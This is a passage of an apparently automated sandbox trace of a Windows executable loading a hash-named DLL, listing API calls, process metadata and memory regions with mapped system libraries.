(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.473] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.474] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.477] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.478] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.479] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.480] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.481] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.482] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.483] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.640] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.641] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.642] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0269.659] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0269.667] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0269.668] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0269.668] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0269.668] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0269.668] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0269.668] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b70f0 | out: hHeap=0x4a0000) returned 1 [0269.670] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab9e0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4fa0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4fe0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0540 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a5020 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a5060 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab440 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3fb0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab290 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3eb0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a9900 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4090 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a25f0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3ef0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0720 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab620 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b0cc0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a3f70 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4aba20 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab320 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab5c0 | out: hHeap=0x4a0000) returned 1 [0269.670] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4aba40 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab6b0 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4aba80 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d00 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d20 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d40 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8510 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8710 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a8d60 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab380 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b90e0 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ab3b0 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b9340 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a9ed0 | out: hHeap=0x4a0000) returned 1 [0269.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a4860 | out: hHeap=0x4a0000) returned 1 [0269.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ee0 | out: hHeap=0x4a0000) returned 1 [0269.673] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0269.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4aaca0 | out: hHeap=0x4a0000) returned 1 [0269.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b10 | out: hHeap=0x4a0000) returned 1 [0269.828] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0269.829] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0269.829] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0269.829] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0269.829] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0269.832] LocalFree (hMem=0x4a9770) returned 0x0 [0269.832] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0269.833] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0269.833] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b2060 | out: hHeap=0x4a0000) returned 1 [0269.834] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4680 | out: hHeap=0x4a0000) returned 1 [0269.834] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0269.835] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0269.835] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0269.835] ExitProcess (uExitCode=0x0) [0269.836] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ac320 | out: hHeap=0x4a0000) returned 1 Thread: id = 186 os_tid = 0x6d4 Process: id = "21" image_name = "giumlol.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe" page_root = "0x4479a000" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xcc8" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5005 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5006 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5007 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 5008 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 5009 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 5010 start_va = 0x170000 end_va = 0x171fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 5011 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5012 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5013 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 5014 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 5015 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5070 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5071 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5072 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5073 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5074 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 5075 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5076 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5077 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5078 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 5079 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 5123 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5124 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 5125 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5126 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5127 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5128 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5129 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5130 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5131 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5132 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5133 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5134 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5135 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5136 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5137 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5196 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5197 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 5198 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5199 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 5200 start_va = 0xa90000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 5265 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 5266 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5267 start_va = 0x1e90000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 5268 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 5339 start_va = 0x1e90000 end_va = 0x1f4ffff monitored = 0 entry_point = 0x1eb0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5340 start_va = 0x1fe0000 end_va = 0x1feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 5341 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 5468 start_va = 0x1e90000 end_va = 0x1f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 5469 start_va = 0x1ff0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 5470 start_va = 0x21f0000 end_va = 0x25effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 5536 start_va = 0x25f0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 5682 start_va = 0x2df0000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002df0000" filename = "" Region: id = 6273 start_va = 0x180000000 end_va = 0x180018fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000180000000" filename = "" Region: id = 6275 start_va = 0x3dc0000 end_va = 0x40f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6324 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 6325 start_va = 0x4100000 end_va = 0x4395fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 6429 start_va = 0x4100000 end_va = 0x4248fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 6432 start_va = 0x4100000 end_va = 0x42c4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 6489 start_va = 0x4100000 end_va = 0x5691fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8165 start_va = 0x7ffc5bcc0000 end_va = 0x7ffc5bce8fff monitored = 0 entry_point = 0x7ffc5bcd4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 8263 start_va = 0x7ffc5c190000 end_va = 0x7ffc5c356fff monitored = 0 entry_point = 0x7ffc5c1edb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 8264 start_va = 0x7ffc5be60000 end_va = 0x7ffc5be6ffff monitored = 0 entry_point = 0x7ffc5be656e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 8360 start_va = 0x4100000 end_va = 0x42d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8469 start_va = 0x7ffc5a8a0000 end_va = 0x7ffc5a949fff monitored = 0 entry_point = 0x7ffc5a8c7910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8470 start_va = 0x7ffc5e740000 end_va = 0x7ffc5e7aafff monitored = 0 entry_point = 0x7ffc5e7590c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8471 start_va = 0x7ffc5e950000 end_va = 0x7ffc5e957fff monitored = 0 entry_point = 0x7ffc5e951ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8495 start_va = 0x7ffc5cb30000 end_va = 0x7ffc5cb46fff monitored = 0 entry_point = 0x7ffc5cb31390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8520 start_va = 0x4100000 end_va = 0x425efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 8527 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1afff monitored = 0 entry_point = 0x7ffc4bf124e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 8529 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8530 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 8531 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 8532 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8533 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8534 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8535 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8536 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8537 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8538 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8539 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8540 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8541 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8542 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8543 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8544 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8545 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8546 start_va 